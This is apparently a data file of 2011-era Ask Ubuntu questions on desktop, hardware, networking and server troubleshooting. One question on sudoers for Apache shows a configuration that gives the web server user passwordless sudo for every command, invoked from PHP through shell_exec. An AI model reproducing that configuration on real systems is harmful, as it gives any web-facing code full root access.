64360	proliant dl380 g4 lm_sensors does n't work	i have ubuntu server 11.04 edition , and i have installed and configured lm-sensors properly and grub boot is normal/default set . when i type the following command : sensors i get : acpitz-virtual-0 adapter : virtual device temp1 : +8.3â°c ( crit = +31.3â°c ) and after : sudo sensors-detect output is : sorry , no sensors were detected . either your system has no sensors , or they are not supported , or they are connected to an i2c or smbus adapter that is not supported . if you find out what chips are on your board , check lm-sensors.org/wiki/devices for driver status . this ca n't be a right output , anybody had this kind of problem on this server ? i need a bios upgrade ? if so please provide me with a detailed guide because bios is a delicate thing . thanks in advance !
64365	how can i access a tty from the terminal ?	how can i access a tty ( eg tty1 ) from the gnome-terminal ? can i set up a profile which does that ? i know the switch using ctrl+alt+f1-6
64366	group access to directory	on my webserver i have a directory www that has the permission drwxrwxr -- and user : group root www-data so that apache can access it . now i have added my account to the group www-data with sudo usermod -g www-data myuser and if i do 'groups ' www-data is among them , but when i try to simply cd into it i get permission denied . if i change the user to myuser or set the group to some other group i 'm a member of ; i can get in . so am i missing something ?
64371	screen distorted on a great wall a081 netbook	i am new here . please make it easy for me to understand . recently i installed ubuntu 10.04 netbook edition inside windows using wubi with ultra iso and magic iso virtual manager in my great wall a081 netbook ... .the problem is that when i start ubuntu the screen gets distorted and blurred . i have tried the debugging mode using failsafex . in failsafex ubuntu starts with an error that `` screen , graphic card and input devices are not detected , you have to debug them '' please help me ! my netbook specification is given below : processor : mobile via c7-m 1600mhz cache : 128kb l2 chipset : via cn896nb ram : 512mb graphics card : integrated via s3g unichrome pro , 64mb screen : 10.2 inches tft wxga ( 1024 ă 600 ) hard drive : 120g wireless : via networking technologies networking : realtek rtl8139 family battery : 2200mah dimensions : 249mm ( l ) x 178mm ( w ) x 38.5mm ( h ) weight : 1221.5g ( default ) operating system : winxp i tried the following section `` device '' identifier `` configured video device '' driver `` openchrome '' endsection section `` monitor '' identifier `` configured monitor '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` default configured device '' endsection ( the screen became unstable as b4 ) my xrandr -q screen 0 : minimum 640 x 480 , current 1280 x 720 , maximum 1280 x 720 default connected 1280x720+0+0 0mm x 0mm 1280x720 0.0* 1024x600 0.0 800x600 61.0 720x576 0.0 720x540 0.0 720x480 0.0 640x480 60.0 my cvt for 1024x600 # 1024x600 59.85 hz ( cvt ) hsync : 37.35 khz ; pclk : 49.00 mhz modeline `` 1024x600_60.00 '' 49.00 1024 1072 1168 1312 600 603 613 624 -hsync +vsync i tried with nomodeset at the grub and openchrome at the xorg.conf but same old result - distorted and hundreeds of lines in the screen . my xrandr is screen 0 : minimum 640 x 480 , current 1280 x 720 , maximum 1280 x 720 default connected 1280x720+0+0 0mm x 0mm 1280x720 0.0* 1024x600 0.0 800x600 61.0 720x576 0.0 720x540 0.0 720x480 0.0 640x480 60.0 1024x600_60.00 59.9 1024x600_6o.oo 59.9 commands are : xrandr -- newmode `` 1024x600_60.00 '' 49.00 1024 1072 1168 1312 600 603 613 624 -hsync +vsync xrandr -- addmode default 1024x600_60.00 xrandr -- output default -- mode 1024x600_60.00 when i press enter after typing the xrandr -- output ... ... it gives error `` crct 0 failed ''
64372	gnome-shell and unity run at the same time	i have installed ubuntu oneiric and everything seemed to work fine , downloaded binary ati catalyst 11.9 . after that installed gnome shell . typed in terminakl gnome-shell -- replace but still there are problems , seems like unity is disturbing gnome shell , when i point my mouse to the top left of the screen which opens applications/windows menu . last time somehow managed to uninstall unity completely and for the moment gnome-shell worked properly , but after reboot , everything crashed , was n't even able to boot in . any ideas ? seemed for me like unity was trying to show it 's panel in the top of gnome-shell 's panel .
64375	how do i revert to 11.04 's version of nautilus ?	since the developers deliberately broke the very useful emblems feature that i 've relied on for years and years with ubuntu ( how do i tag files with custom icons in nautilus ? ) , while offering no replacement whatsoever , i guess i need to revert to the older version of nautilus . how can i do this ?
64377	linksys wmp54gs-eu wireless card not detected	i have just installed ubuntu 11.04 on my pc but wireless card linksys wmp54gs-eu is not detected . it says `` there is no firmware '' . on system - administration - extra drivers i found only the video card drive which i regularly downloaded . external software sources are duly enabled on synaptic - repository . ok i find the solution : i downloaded from ubuntu software center the repository `` b43-fwcutter '' detected from terminal ( lspci ) .
64380	which is opera next 's directory ?	i recently installed opera next via tar . i saw it , `` played '' with it , and now i want to uninstall it . where can i find it 's directory ? the package is neither in ubuntu software center , nor in synaptic package manager .
64382	how to disable num lock warning	in the log in ( and lock ) screen of ubuntu 11.10 i get annoying warnings that my num lock is on . as it is ( on my desktop ) totally irrelevant or num lock is enabled or not , is there a way to disable this warning ?
64383	show desktop works slow , and not so perfect	on ubuntu 11.04 with unity , super + d shortcut should minimise all windows and show desktop . this works with few windows , but as number of opened windows raises , the slower it gets , and sometimes it fails to minimise all of them . does this happens to you ? it 's really annoying . is there any opened bug or workaround ?
64386	how to setup one ethernet interface as dhcp server and another interface as static ip ?	i am getting a static ip from provider . but in my ubuntu 11.04 pc i have two reserved ethernet interface mostly both are like getting automatic dhcp ip as of now . but i want my ethernet interface 0 as static ip wan . and ethernet interface 1 as dhcp server . how can i do this setup ?
64387	can not successfully source .bashrc from a shell script	normally we can source ~/.bashrc file using this command source ~/.bashrc but if i write this in a shell script and execute it , nothing happen . why ? is there any way to do this ? my shell code : # ! /bin/bash chmod a+x ~/.bashrc source ~/.bashrc also tried . [ dot ] instead of source . same result
64392	packaging best practices for third-party dependencies	i 'm packaging an application for the first time for ubuntu . i have a few dependencies , the primary ones being qt and icu . i 'm just not clear how to deploy these applications without getting into a kind of dll-hell for linux . for example , i would like to use version 4.7.4 of qt because there are some bug fixes in that release that i would like to take advantage of . i would also like to deploy my application on all the currently supported versions of ubuntu , which takes me back to lucid . but the latest version available for lucid is 4.6.2 , which is n't even api-compatible with 4.7.4 . the options , as i see it : just say `` tough '' and only support ubuntu versions that have the library i need , which would mean oneiric at this point . for earlier versions , they are on their own to find a 4.7.4 library and resolve all its dependencies . provide private versions of the library , say libqtcore4_mycompany , and a package to install them . stick a private version of the assembly side-by-side with my application ( perhaps /opt/company/package/lib ) and set ld_library_path before executing my application . none of these are great options , and in particular , debuild is awful to use if you depart in the slightest bit from their expectations . i can not link statically because of lgpl restrictions ( at least , that 's how i understand them . ) i also have the reverse question . suppose i decide to put a dependency on libqtcore4 ( > = 4.7.4 ) . i have seen enough regressions between qt versions that there is a chance that 4.7.5 , or 4.8.0 , will break something in my application . is that just something you have to deal with , or is it a best practice to depend on an exact version of the library , like libqtcore4 ( = 4.7.4 ) ?
64397	update manager saying check your internet connection ... how do i fix this so it can update ?	here are the details it gave me as causing the problem : w : failed to fetch http : // dowload.virtualbox.org/virtualbox/debian/dists/maverick/release.gpg something wicked happened resolving 'dowload.virtualbox.org : http ' ( -5 - no address associated with hostname ) , w : failed to fetch http : // dowload.virtualbox.org/virtualbox/debian/dists/maverick/contrib/source/sources something wicked happened resolving 'dowload.virtualbox.org : http ' ( -5 - no address associated with hostname ) , w : failed to fetch http : //dowload.virtualbox.org/virtualbox/debian/dists/maverick/contrib/binary-i386/packages something wicked happened resolving 'dowload.virtualbox.org : http ' ( -5 - no address associated with hostname ) , w : failed to fetch http : // dowload.virtualbox.org/virtualbox/debian/dists/maverick/contrib/i18n/translation-en something wicked happened resolving 'dowload.virtualbox.org : http ' ( -5 - no address associated with hostname ) , w : failed to fetch http : // ppa.launchpad.net/elegant-gnome/ppa/ubuntu/dists/natty/main/source/sources 404 not found , w : failed to fetch http : // ppa.launchpad.net/elegant-gnome/ppa/ubuntu/dists/natty/main/binary-i386/packages 404 not found , w : failed to fetch http : // ppa.launchpad.net/team-xbmc/ppa/ubuntu/dists/natty/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/team-xbmc/ppa/ubuntu/dists/natty/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead .
64401	gnome keyring not remembering auth for autosshfs	i am running ubuntu 11.10 and using autosshfs , a per user sshfs automount using userâs ssh config and keys . this works great except that gnome keyring is n't remembering the authentication and constantly prompts for the password to the key when remounting ( after ssh timeout ) . my rsa keys reside inside ~/.ssh with the very restrictive 0400 permissions . i 've added the private keys to the keyring with ssh-add and the public keys to authenticated_keys . i can confirm that they are in the keyring since they show up when i run ssh-add -l. snip from auth.log looks like this : oct 5 14:01:34 flax sudo : root : tty=unknown ; pwd=/ ; user=oddy ; command=/bin/bash -c \/usr\/local\/sbin\/autosshfs-ssh remotehost\.com ; oct 5 14:13:45 flax sudo : oddy : tty=pts/0 ; pwd=/home/oddy ; user=root ; command=/bin/cat /var/log/auth.log oct 5 14:14:51 sudo : last message repeated 2 times oct 5 14:17:01 flax cron [ 5862 ] : pam_unix ( cron : session ) : session opened for user root by ( uid=0 ) oct 5 14:17:01 flax cron [ 5862 ] : pam_unix ( cron : session ) : session closed for user root oct 5 14:36:36 flax login [ 1309 ] : pam_unix ( login : session ) : session opened for user oddy by login ( uid=0 ) oct 5 14:38:11 flax login [ 1309 ] : pam_unix ( login : session ) : session closed for user oddy i ca n't find anything in there that would suggests that it 's failing . ssh : ing to the remote host through console does n't prompt for a password , so the keyring does work for that specific key , just not together with autosshfs . any ideas ?
64405	dual monitors - shifted pixels	the resolution looks fine size-wise , but pixels are smudged . this is mostly visible on thin writing , as if pixels were slightly shifted out of the intended grid . it always renders like that on one of the monitors chosen at random sometimes along with thin vertical stripes roughly 10px wide . to make things work i can just bring up the display settings . everything seems fine here ( 1600x900 , dual , no changes ) > > hit apply > > keep this configuration . without changing anything , the display looks ok for now , every time . in some cases just bringing up the display settings without hitting apply will fix it . however , the problem appears again every time the computer starts , wakes up or the screen is unlocked . it does n't seem to be hardware related or related to version of ubuntu . just for completeness . both monitors are brand new dell in2010nb , native resolution 1600x900 . there are no proprietary drivers used on the pc ( dell xps 210 , ati radeon x1300 graphics ) . ubuntu version is 11.10 î˛ . the same problem persisted on 10.10 lts as well , hence we wiped out the system and installed 11.10 î˛ to see if that resolves the issue . it did n't , but i like 11.10 a lot .
64411	refresh database in banshee	i have a library of around 20k songs and it takes forever to banshee to index it . i would like to force a database refresh by cron . my pc starts every night to do the backup with my cloud backup service and i would like to take the chance to refresh the banshee database at the same time . what can be the command to run ?
64415	two seperate hdd 's or intel raid for dual boot	looking for some advice i am looking to dual boot a new machine with ubuntu 11.10 64 and win64 pro would i better going for two separate 500gb hdd 's foreach os or intel soft raid . build win7 first on raid shrink the 1tb by 500gb and partition and then install u11.10 on that ?
64416	gnome shell user theme extension	how do i activate the gnome-shell user-theme extension in oneiric with gnome 3.2 ? i 've installed the package gnome-shell-extensions-user-theme but ca n't find anywhere on how to activate it . i thought the gnome-shell-extensions-tool was the way but when i run it nothing happens .
64418	what is the most robust archive format ?	i 'd like to back up some old folders with documents i only very rarely need to access . for that , i 'd like to put them all in one archive . as this will be a backup , the format should suit that purpose . so , bottom line : which one is the most reliable/robust archiving format in ubuntu ?
64422	ubuntuone-daemon using 3gb of ram if no internet connection	why is ubuntu one taking so mutch of my ram and cpu if there is no internet connection available ? a bug ?
64432	one monitor getting spilled over into other monitor : how to do a 100 % reset of gnome graphics configuration	i had to kill a vmware process and afterwards , my monitor 's configuration is buggy . i have 2 monitors in a side-by-side configuration . my right-hand monitor is the secondary monitor . upon its right-hand side there are about 50 pixels showing from the left side of the lefthand monitor ( ie , as if it was wrapped around ) . further , my mouse clicks are registering as about 50 pixels sideways from where they should be . it 's as if those 50 pixels between monitors got gobbled . what have i done ? i 've reset the screen configuration in multiple ways , using xrandr , multiple monitors app , etc . this persists in different side-by-side configurations , and also persists with another user . it does not occur with xfce . resetting the window manager with the compiz reset wm app does not fix this . i 've concluded the burn-to-the-ground approach is likely the best , and would like to do a 100 % reset of my graphics settings . it 's an intel integrated chipset . removing ~/.config/monitors.xml did not work . also , interestingly , the mouse can mouse-over the 50 errant pixels on the rhs of the right-hand monitor . i hypothesize that it 's a compositing problem occurring at the layer where the background , selection , and clicks are caught . also , inverting the right-hand monitor removes the issue , but renders the screen unusable . even more datapoints : this happens in kde as well sometimes logging into gnome and running xrandr -- output dvi1 -- auto resets it , but the issue immediately reappears when i press alt-tab . with compiz application switch turned on , the workspace is 'pushed back ' a bit , and the slice on the rhs follows it as well . i 'm wondering if it 's a flaw in the compiz workspace compositing configuration . i suspect the error was in the compositing configuration . i installed 11.10 .
64443	terminal says 'broken package ' when using apt-get to install phpmyadmin	i have tried to install phpmyadmin using the sudo apt-get install phpmyadmin command > the terminal says that there are `` uninstallable '' dependencies , therefore the package is broken.perhaps the following copy-paste from the terminal will explain the full view : sudo apt-get install phpmyadmin [ sudo ] password for sam : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : phpmyadmin : depends : php5-mysql but it is not going to be installed or php5-mysqli but it is not installable recommends : php5-gd but it is not going to be installed e : broken packages what do you suggest on this problem ?
64444	when is precise pangolin being released ?	when is 12.04 `` precise pangolin '' ( the next lts ) being released ? it has been announced here .
64447	list of gnome-shell 3.2 extension	i recently upgraded to 11.10 , and am using gnome-shell 3.2 . i have n't been able to find a comprehensive list of extensions that work with version 3.2 of gnome-shell . if you know of any please list out any extensions with links so that they can be found in one place .
64454	how do i enable the mod_rewrite apache module for ubuntu 11.04 ?	in other linux like centos , it works but i am not getting it running in ubuntu 11.04 . /var/www/html/folder/public/.htaccess : invalid command 'rewriteengine ' , perhaps misspelled or defined by a module not included in the server configuration
64455	set up two identical usb printers	i want to hook up 2 usb label printers to one machine , so that each one can have different size labels loaded in it . they are both zebra 2844 printers . either one installs and works just fine by itself , but it does n't recognize that there are 2 of them if 2 are plugged in . the add printer window just shows one , and if i install one , then go to add the second one , the add printer window still just shows one , and if i select it and set it up ( while assuming i 'm setting up the second one ) it just prints to the first one still . if i have both of them plugged in , and unplug the one it does n't print to , the printer window shows the one that does work as offline . what can i do to make this work ? is there some way to manually set up the second printer ?
64456	sync folder automatically upload files ?	after i sync a folder i will have to upload each file in that folder , or ubuntu one will upload all of them for me ? i am not sure of how it really works .
64461	why ca n't other users access my samba share without force user = me ?	i have a samba related problem . i have a successful samba server set up on my home server . unfortunately only my account can access the shares when force user is not set to my account ( server ) . i can not understand why the other user can not access my share `` vector_public '' when i have n't set `` force user = server '' . do you have any ideas to what might cause this ? i 'm a samba noob so please if i 've misunderstood any of the settings : [ vector_public ] comment = vector public share read only = no path = /media/storage/public guest ok = no force user = server force group = storage_public create mask = 0770 directory mask = 0770 security mask = 0770 force create mode = 0770 force directory mode = 0770 valid users = server storage_share browseable = yes writeable = yes vfs objects = recycle recycle : repository = .deleted/ % u recycle : keeptree = yes recycle : touch = yes recycle : versions = yes recycle : maxsize = 0 [ vector_private ] comment = vector private share ( niklas ) read only = no path = /media/storage/private guest ok = no force user = server force group = server create mask = 0770 directory mask = 0770 security mask = 0770 force create mode = 0770 force directory mode = 0770 valid users = server browseable = yes writeable = yes vfs objects = recycle recycle : repository = .deleted/ % u recycle : keeptree = yes recycle : touch = yes recycle : versions = yes recycle : maxsize = 0 the permissions on the two directories are : drwx -- -- -- 6 server server 4096 2011-10-05 20:40 private drwxrwx -- - 5 server storage_public 4096 2011-10-05 20:28 public it 's the directory public that i have this problem on . apparently none of the settings under the share vector_public changes this behaviour so it must be because of some other setting , these are all the other settings in my config : workgroup = rosenqvist server string = % h server ( samba , ubuntu ) # wins support = no ; wins server = w.x.y.z dns proxy = no ; name resolve order = lmhosts host wins bcast ; interfaces = 127.0.0.0/8 eth0 ; bind interfaces only = yes log file = /var/log/samba/log. % m max log size = 1000 # syslog only = no syslog = 0 panic action = /usr/share/samba/panic-action % d security = user # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . encrypt passwords = true passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user ; domain logons = yes ; logon path = \\ % n\profiles\ % u # logon path = \\ % n\ % u\profile ; logon drive = h : # logon home = \\ % n\ % u ; logon script = logon.cmd ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u ; add group script = /usr/sbin/addgroup -- force-badname % g ; printing = bsd ; printcap name = /etc/printcap ; printing = cups ; printcap name = cups ; include = /home/samba/etc/smb.conf. % m ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash ; winbind enum groups = yes ; winbind enum users = yes ; usershare max shares = 100 usershare allow guests = no any ideas what i should do ? ( please also check the new comments ) additionally , how do i know if my network have wins server support ?
64465	how to setup sudoers for apache web service ?	# user privilege specification root all= ( all : all ) nopasswd : all apache all= ( all : all ) nopasswd : all me all= ( all : all ) nopasswd : all in fedora both works : http : //localhost/test echo shell_exec ( `` sudo dmidecode | grep uuid '' ) ; // nothing shows to encrypt/decrypt licenses php -r `` ..license.. '' ;
64466	how do i get the envelope to turn blue when new e-mail arrives in thunderbird ?	using 11.10 . i have thunderbird set up and have been receiving new emails . but the envelope indicator in panel never turns blue . i 'm aware of this ask ubuntu : how to make thunderbird notify of new email like evolution ? but since thunderbird is default , is n't the envelope supposed to work out of the box ? could someone please advise what is wrong here ?
64468	what happens when devices are created and how do i emulate the behaviour myself ?	the reason i ask the question is because i would like to emulate a device or create a device ( specifically a usb-device ) on disk without connecting the physical device . what i would like is to create a device such that it shows up in the lsusb output . what i have tried so far is creating a file with dd and using losetup to connect the created file with a loop device ( /dev/loop* ) . that however does n't create a message in dmesg . edit : as requested here 's more info on my dilemma . i bought a usb-stick quite a while back with a language trainer that has limited it 's execution ( .exe ) to the usb-stick . since wine does n't transfer the usb device data to the exe i was forced to use it in a vm . since i use the stick on a vm , i thought i could emulate it on my host and go completely virtual - no need for the physical usb-stick .
64478	is there any hope of remnant 's monthly release proposal going active ?	after reading scott james remnant 's monthly release proposal for ubuntu ( http : //netsplit.com/2011/09/08/new-ubuntu-release-process/ ) , i developed great hope that this might actually happen . i very much like the `` rolling release '' concept ( a la arch linux ) coupled with a stable `` for the masses '' lts release every two years . personally , i think the 6 month release cycle creates way too many bugs . bugs that unfortunately live for years , even through lts releases . ultimately this situation is holding ubuntu back from mainstream adoption . pushing the lts release as the `` recommended for consumers '' build would allow third-party application-developers to focus on a stable platform for increasing mainstream support and acceptance of ubuntu . having the os overhauled every 6 months is too tumultuous for mainstream adoption . the rolling release would help increase the stability and development of the lts while simultaneously providing cutting edge stuff along with less reliance on ppas for those who want newer versions of applications . it would also more gradually ease users into change . i 'm curious as to canonical 's reaction to the proposal . is it receiving serious consideration ? does canonical have another plan to address the many bugs that plague ubuntu ?
64480	how can i make pdfs appear life-size when displayed at 100 % ?	when i open a letter size pdf and then zoom to 100 % , the page physically displayed on my monitor is smaller than a real letter size sheet of paper . how can i make `` 100 % '' on the computer screen correspond with `` 100 % '' in real life ? details this message suggests that i should be investigating the system-wide dpi settings for my monitor . xdpyinfo reports : dimensions : 1024x768 pixels ( 271x203 millimeters ) resolution : 96x96 dots per inch my monitor has a native display resolution of 1024x768 pixels and a diagonal display size of 12.07 inches . px calc returns the following information : dpi : 106.05 dot pitch : 0.2395mm size : 9.66 '' ă 7.24 '' ( 24.53cm ă 18.39cm ) what i 've tried so far running xrandr -- dpi 106.05 successfully caused my pdf to appear actual size at 100 % , but this effect was lost after rebooting . to make the setting persistent i tried creating the following /etc/x11/xorg.conf : section `` monitor '' identifier `` thinkpad x60 lcd '' displaysize 245 183 endsection section `` screen '' identifier `` screen0 '' monitor `` thinkpad x60 lcd '' endsection after re-logging in , /var/log/xorg.0.log contained [ 1167.824 ] ( ** ) intel ( 0 ) : display dimensions : ( 245 , 183 ) mm [ 1167.824 ] ( ** ) intel ( 0 ) : dpi set to ( 106 , 106 ) but xdpyinfo still reported dimensions : 1024x768 pixels ( 271x203 millimeters ) resolution : 96x96 dots per inch and `` 100 % '' still appeared too small .
64482	backup drive : ext4 / fat ?	if i 'm backing up to an external drive , is there any reason to not use fat other then fat 's file size/naming issues ? it would be nice to be able to access the content on windows/mac but i 'm not sure if there 's any reason i have to use ext4 to backup with ubuntu files . this is really only for documents/photos/videos i have on the system .
64483	sandy bridge support any good yet ?	i 'm looking at a g530 sandy bridge and wondering if the integrated gpu , sound , and networking will work well out of the box ? i 'm particularly interested in vdpau support in mplayer , and would like opengl to work well enough to run googleearth . yes , i have read the thread from june . support at that time was not what i 'd call acceptable , so i 'm wondering how much it has improved .
64484	how to install adobe flash into bootable usb	let me explain a couple things before my question ... i am running ubuntu from my flash drive because my hard drive crashed and i am waiting on some parts to come in . since i can not install ubuntu onto the hard drive it makes it a real pain to install adobe flash . what i am wondering is it possible to take the flash.so file and put it into the files that the usb drive uses to run ubuntu , so in other words i install flash and it works when the computer boots up and i launch firefox .
64485	ca n't log into skype : complains of the existence of another instance when there is n't one	whenever i try to log into skype in ubuntu 11.10 64-bit , it always says `` sign in failed '' and `` another skype instance may exist '' , thus preventing me from being able to log in . i 've had this kind of error in the past on previous ubuntu releases where i would forget i already had skype running and try opening it in the dash again , and it was easily solved by just closing the extra window . but this time is different , and much more frustrating , because i get this error even after starting from a cold boot or running killall skype ... times when afaik skype should not even be running at all . skype does n't even show up in the processes tab of system monitor before i try starting it up , so i am pretty sure there is no second instance running . i am using the 2.2.0.35-1 version of skype from the ubuntu software center . i have already tried reinstalling it to no avail . any other suggestions ? other things i 've tried : tried the first answer to be posted to get the following output : christopher @ xyz : ~ $ ps -ax | grep skype warning : bad ps syntax , perhaps a bogus '- ' ? see http : //procps.sf.net/faq.html 10072 pts/0 s+ 0:00 grep -- color=auto skype christopher @ xyz : ~ $ kill -kill 10072 bash : kill : ( 10072 ) - no such process i have also tried a suggestion from the comment to this answer for a very similar problem ( specifically , running pkill skype and pkill -9 skype ) , but that did n't work either .
64490	how can i stop workspaces from switching automatically to other workspaces when selecting different applications ?	how can i stop workspaces from switching automatically to other workspaces when selecting different applications ? i personally find it extremely annoying , and bad ui , to have the context/rug/workspace be pulled from underneath me and i want to prevent , under any circumstance , except of my own choosing the automatic workspace re-adjustment program that unity ( and osx , but that 's another story ) imposes on me . is there a way to do this ? thanks ! update the interface solution that i 'm looking for exists already in gnome `` classic '' , unfortunately it is not as nice of a desktop as unity or gnome3 , it has a simple bar at the top and an open windows bar at the bottom of the screen , and on this bottom bar there are 4 work-spaces screens on the right side , it is these that work exactly how i imagined a good work-space should work -- that is : in each work-space i can start up an application and if i switch to another one work-space i can start up the same application without being switched to my previous works-pace . i imagine if this behavior exists already that someone with deep knowledge about the work-space or perhaps a developer that has worked on these or their updated counterpart in unity could let me know how the appropriate settings can be manipulated in unity to bring back the behaviour of the work-spaces similarly to gnome 'classic ' .
64491	java class not found error when opening citrix	when i try to open citrix , i am getting below error . please advise . ubuntu : 11.04 firefox : 7.0.1 sun java version :1.6.0_26 load : class com.citrix.connectioncenter not found . java.lang.classnotfoundexception : com.citrix.connectioncenter at sun.plugin2.applet.applet2classloader.findclass ( applet2classloader.java:252 ) at sun.plugin2.applet.plugin2classloader.loadclass0 ( plugin2classloader.java:250 ) at sun.plugin2.applet.plugin2classloader.loadclass ( plugin2classloader.java:180 ) at sun.plugin2.applet.plugin2classloader.loadclass ( plugin2classloader.java:161 ) at java.lang.classloader.loadclass ( classloader.java:247 ) at sun.plugin2.applet.plugin2classloader.loadcode ( plugin2classloader.java:687 ) at sun.plugin2.applet.plugin2manager.createapplet ( plugin2manager.java:3025 ) at sun.plugin2.applet.plugin2manager $ appletexecutionrunnable.run ( plugin2manager.java:1498 ) at java.lang.thread.run ( thread.java:662 ) exception : java.lang.classnotfoundexception : com.citrix.connectioncenter
64494	wired connection shared with other computers connects then disconnects in the nm-applet	connecting with shared with other computers connection in networkmanager . other computer gets ip but networkmanager disconnects the shared connection after half a second . this same setup worked perfectly fine in 11.04 . is there any fix , workaround or alternative way to share a connection with another computer over an ethernet cable . ( i can downgrade to 11.04 but i 'd rather not ) . edit : found a workaround the workaround for now is to set ipv6 options to ignore and then sudo killall dnsmasq . reconnect and it should work .
64496	allocate more disk space ; only partition	my computer when crazy ( literally , shutting off by itself , etc ) and i restart it , well when it came back on , i had the 'grub rescue ' message . the only partition/hd i have on my computer is ubuntu 11.04 ( before it went crazy i had a dual boot with windows 7 ) . i currently have 50gb allocated to ubuntu ( i meant to make it the swap partition ) , while i have 110gb of free space . i do n't even have a recovery partition anymore as it all vanished . how do i extend the partition/allocate more of the 110gb to the ubuntu drive when it 's the only one i have ? do i have to re-install a clean install of ubuntu ? hopefully somebody can help me . thank you so much in advance .
64498	connect ubuntu to lg tv issue	i got a lg 32 inch tv ( lg 32pc51 ) and i try to connect it to geforce 8600gs 512mb card , i tried hdmi , vga and i can not make it look good without flicking or something that fits to that screen . my friend told me that nvidia cards general do issues with linux and he solved it by buying a simple ati or other company 's card i need very simple card it 's just to view the desktop and sometimes work on it , no games , graphics etc . needed . cheap card ideas ?
64501	my network manager applet is dumb ?	i 'm using a modem to connect to internet , may be because of poor signal strength my internet gets disconnected often , but when it does network manager applet have to show that i 've been disconnected but it does n't . is this the problem with my modem or the applet ? i 've been using ping command in a terminal window to check my connection
64504	if i can , how do i install ubuntu from ubuntu ?	here 's what i mean : i normally install by running a ubuntu live usb , clicking `` try '' ubuntu , and when i 'm ready , i double-click the `` install ubuntu '' icon on the desktop . now , i have an esatap port and what i 'd like to do is connect my hard drive directly to my laptop/desktop which already has ubuntu running on it and simply run that same application that 's available on the live cd/usb to install it on the external drive . i 'm open to other methods as well , as long as i do n't have to `` burn '' an iso to a usb , then reboot from the usb , then install it to the external drive . a million thanks !
64508	how to disable avahi ?	i am completely new linux systems especially ubuntu . i am currently using 11.04 and i ran into some trouble and i really need your help . everything was working fine for the past several days until a few minutes from now when i opened my ubuntu desktop i have problems that i really do n't have any idea about why i have this and how i got this error . when i opened my mozilla browser there is a dialog box that is asking for authentication . im sure i have n't done any changes on the settings to eanable this . this is what is asked in the dialog box : authentication required a username and password are being required by http : //google.com . the site says : `` airstation : enter `` root '' for username . '' i tried to use the username `` root '' and used my password but it says error . i tried to ignore this and tried other things . i tried to install something using `` ubuntu software center '' . when i clicked the `` install '' button there was a pop up message that appeared and it says : network service discovery disabled your current network has a .local domain , which is not recommended and incompatible with avahi net service discovery . this service has been disabled . i do n't what is avahi software and how it got into my system . i ca n't recall installing this thing . please help . thanks in advance .
64512	how do i reset/restore an icon in the start menu ?	i have an entry for the web browser firefox in my start/favorites/kicker/kde menu which has no icon . all other entries are ok . the text reads `` web browser '' and , smaller and gray , `` firefox web browser '' . i looked in favorites , search and app/inet how do i restore the firefox icon ?
64513	does n't detect usb modem after kernel update	i 'm a noob to linux . just installed lucid lynx a couple of days ago ( through my flash drive ) because i always wanted to use linux in default . it was a clean install . now the next stop for me was to configure my internet . its a usb modem ( netconnect huwaei ec150 ) and my isp is reliance . although there was no installation package or anything supplied with the modem for linux , i still googled my way through ( and found a lot of people who had the same problem of connecting their netconnect modems with ubuntu and its derivatives ) and installed : libuniconf4.6_4.6.1-1_i386 libwvstreams4.6-base_4.6.1-1_i386 wvdial_1.60.3_i386 gnome-ppp_0.3.23-1_i386 in the same order and the modem started working after several 'detect modem ' and finding the suitable port for the ppp to dial the modem . now i was happy but my lucd used to freeze a lot too . so i googled and a lot of people suggested that their issues were resolved after they updated the kernel . so did i but that 's where it got jammed . when i restarted it , there were 2 linux kernel : .31 and .34 in the boot menu ( i guess thats what grub is but anyway ) now the .34 is running smooth but whenever i try to connect to the internet , it can not detect the ttyusb_utps_modem port through which it is supposed to dial but if i boot up with the kernel version .31 , its freezing but its connecting to the internet . please tell me how to fix it .
64515	will sun 's java be available from canonical 's partner repository ?	i just discovered that oracle 's ( sun 's ) java6 has vanished from the canonical 's partner repo . before java was taken from all repositories i had purchased minecraft for play in ubuntu . after recent reinstall i can not find a way to play this game in the only os installed now on my systems . open source java equivalents will not run this piece of software nor am i able to use yahoo games with my friends . somewheres i should have been given a choice as to what security risks i 'm willing to deal with in order continue to use or not use paid commercial software . is there any solution besides directly downloading the java from sun and trying to reinstall manually ? this method coupled with my short ubuntu term skills is not an option . thank you for recieving and reciprocating .
64517	how do i manage multiple ubuntuone accounts ?	i have 2 ubuntuone accounts . i am logged it to the first i created , and my ubuntu natty pc folders are synced with that account . i want to switch my ubuntu pc to the second account , but i ca n't find the way . if i disconnect from the first account , the client should give me the possibility to choose another account ; on the contrary , i ca n't see any way to change the account data . am i blind ?
64520	problem with nvidia-settings , twinview and multiple workspaces	here 's what happens : if i have ... ... only the laptop-screen activated ... window a on workspace 1 ... window b on workspace 2 and open nvidia-settings and activate an external display ( twinview ) . what happens then is that window a is moved to the left screen , and window b moved to the right screen both on workspace 1 . if i then deactivate the external display , all windows ( including possible windows on workspace 3 and 4 ) ends up on workspace 1 ! is there a way to fix this ? i just want each workspace to get wider i do n't want windows to me moved around ! ( using natty and gnome . this was n't the behavior in lucid . )
